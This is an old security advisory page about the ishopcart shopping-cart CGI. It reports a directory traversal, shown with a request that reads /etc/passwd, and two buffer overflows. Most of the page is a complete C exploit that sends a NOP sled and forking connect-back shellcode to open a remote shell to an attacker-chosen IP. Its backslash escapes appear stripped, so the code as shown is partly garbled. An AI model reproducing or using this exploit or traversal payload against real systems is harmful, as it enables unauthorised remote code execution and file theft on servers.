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ishopcart cgi 0day and multiple vulnerabilities


Arrow  SecurityAlert : 1031
Arrow  CVE : CVE-2006-2814
Arrow  CVE : CVE-2006-2813
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : bugtraq fbi gov
Arrow  Published : 06.06.2006

Arrow  Affected Software : ishopcart



Arrow  Advisory Content :  

Vendor: ishopcart inc
Vendor Site: ishopcart.com
Vendor Status: notified via telephone

While spending a night auditing I have found 2 buffer overflows and 1
directory traversal in the ishopcart cgi, which is written in C.

The directory traversal is caused by how the cgi chooses to show pages.
If, for example, the CGI is tould to show an order form, the order
form's name is taken as argv[1] and opens this file and prints it, ie:

/cgi-bin/easy-scart.cgi?../../../../../../../etc/passwd

The first buffer overflow is in main()'s szTmp[100] variable. argv[1] is
placed in this variable through a sprintf, although no check is made on
the size of argv[1] before putting it in szTmp:

sprintf(szTmp,"%s",argv[1]);

The other buffer overflow (of which I have succesfuly exploited) lies in
main() also, but is overflowed in vGetPost(). char szBuf[4000]; is
passed to vGetPost() under the circumstance that argv[1] contains
specific criteria. vGetPost() reads POST data until the word "Submit" is
encountered, doing absolutely no bounds checking on the ammount of data
supplied.

When notified via telephone, the author claimed to be in the process of
fixing these errors, and at the same time took ishopcart.com offline.
Provided is the exploit code that spawns a connect back shell. It has been
tested both localy and remotely
and has proved to work 100%

The real issue lies in the fact that this is a shopping cart system.
Also, since this is a cgi script, apache forks before executing it and
hence does not die on unsuccessful attempts, meaning that combined with
a massive 4000 NOP buffer, brute forcing of the offset is possible
leading to a theoretical 100% probability of remote code execution.

The good news is that this program doesn't seem to be common. If you you
would like to view the site and the code, search 'ishopcart' on google
and click it's cached link, then hit the source code link and you'll see
easy-scart.c through easy-scart6.c (all, of which, are vulnerable)

--K-sPecial
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
* Name: ishopcart-cgi-bof.c (<= easy-scart6.c)
* Date: 5/25/2006
* Version:
* 1.00 (5/25/2006) - ishopcart-cgi-bof.c created
*
* Description: there is an overflow in the vGetPost() function, it does
not do any size checking on the inputed data but instead
* reads until the word "Submit" is encountered, in turn overflowing
pszBuf which points to a 4000 byte buffer in main(). Complete
* code execution is spawned, with the code being a connectback shell.
*
* Notes: I could not for the life of me find any connect back shellcode
that forks! This code needed to fork because apache
* was killing the connect back process as soon as it connected. So, in
turn, I have modified netric's callback shellcode with
* some forking shellcode to accomplish the workaround.
*
* Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <stdlib.h>

#define PORT 80
#define CB_PORT 31337
#define IP_OFFSET 33 + 13
#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod
added to cb[]
#define OFFSET 0x41414141 // find your own damn offset, the code works
100% any fault is on yourself

void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);

// netric callback shellcode
char cb[] =
"x31xc0x31xdb"

"xb0x02" // movb $0x2,%al / sys_fork
(2)
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax /
check if child; %eax = 0x0
"x74x05" // je 0x5 /
jump after the exit if we're the child
// sys_exit (1)
"x8dx43x01" // leal 0x1(%ebx),%eax /
sys_exit (1) if we're the parent
"xcdx80" // int $0x80 /
interrupt 80 to execute sys_exit

"x31xc9x51xb1"
"x06x51xb1x01x51xb1x02x51"
"x89xe1xb3x01xb0x66xcdx80"
"x89xc2x31xc0x31xc9x51x51"
"x68x41x42x43x44x66x68xb0"
"xefxb1x02x66x51x89xe7xb3"
"x10x53x57x52x89xe1xb3x03"
"xb0x66xcdx80x31xc9x39xc1"
"x74x06x31xc0xb0x01xcdx80"
"x31xc0xb0x3fx89xd3xcdx80"
"x31xc0xb0x3fx89xd3xb1x01"
"xcdx80x31xc0xb0x3fx89xd3"
"xb1x02xcdx80x31xc0x31xd2"
"x50x68x6ex2fx73x68x68x2f"
"x2fx62x69x89xe3x50x53x89"
"xe1xb0x0bxcdx80x31xc0xb0"
"x01xcdx80";

int main (int argc, char **argv) {
int sock;
unsigned offset = OFFSET, ipaddr, i = 0;
unsigned short port = PORT, cbport = CB_PORT;
struct sockaddr_in server;
char *host, *location, *cbip, buff[5120], opt;

host = location = cbip = 0;

while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
switch(opt) {
case 'i':
host = optarg;
break;
case 'p':
sscanf(optarg, "%hu", &port);
break;
case 'o':
sscanf(optarg, "%x", &offset);
break;
case 'l':
location = optarg;
break;
case '1':
cbip = optarg;
break;
case '2':
sscanf(optarg, "%hu", &cbport);
break;
}
}

if (!(host && location && cbip)) {
puts("-!> a required argument was missingn");
help();
exit(1);
}

changeip(cbip);
changeport(cb, cbport, PORT_OFFSET);

if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("socket() error: %sn", strerror(errno));
exit(1);
}
server.sin_port = htons(port);

if ((ipaddr = inet_addr(host)) == -1) {
struct hostent *myhost;
if ((myhost = gethostbyname(host)) == 0) {
printf("-!> failed to resolve host '%s'n", host);
exit(1);
}
memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length);
}
else server.sin_addr.s_addr = ipaddr;

server.sin_family = AF_INET;
memset(&(server.sin_zero), 0, 8);

if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
printf("-!> connect() to '%s:%hu' failed: %sn", host, port,
strerror(errno));
exit(1);
}
sprintf(buff, "GET %s?sslinvoice HTTP/1.1nHost: %snContent-Length: %unn",
location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"));
send(sock, buff, strlen(buff), 0);

for (0; i < 4000; i++) *(buff+i) = 0x90;
for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a);
for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4);

strcpy(buff+4000+sizeof(cb)+512 - 1, "Submitn");

send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0);
}

void help (void) {
char *string = "ishopcart CGI shopcart buffer overflow exploit by
K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)nLicense:
GPL (5/24/2006)nn"
"-i <%s> t - specifies the vulnerable host; default 80n"
"-p [%hu] t - specifies the vulnerable host's portn"
"-l <%s> t - specifies the vulnerable CGI locationn"
"-o [%x] t - forces an explicit offsetn"
"-1 <%s> t - specifies the connect back ipn"
"-2 [%hu] t - specifies the connect back port; default 31337n"
"-h t - shows this helpn";

puts(string);
}

void changeip(char *ip) {
char *ptr;
ptr=cb+IP_OFFSET;
/* Assume Little-Endianess.... */
*((long *)ptr)=inet_addr(ip);
}

// ripped from some of snooq's code
void changeport(char *code, int port, int offset) {
char *ptr;
ptr=code+offset;
/* Assume Little-Endianess.... */
*ptr++=(char)((port>>8)&0xff);
*ptr++=(char)(port&0xff);
}





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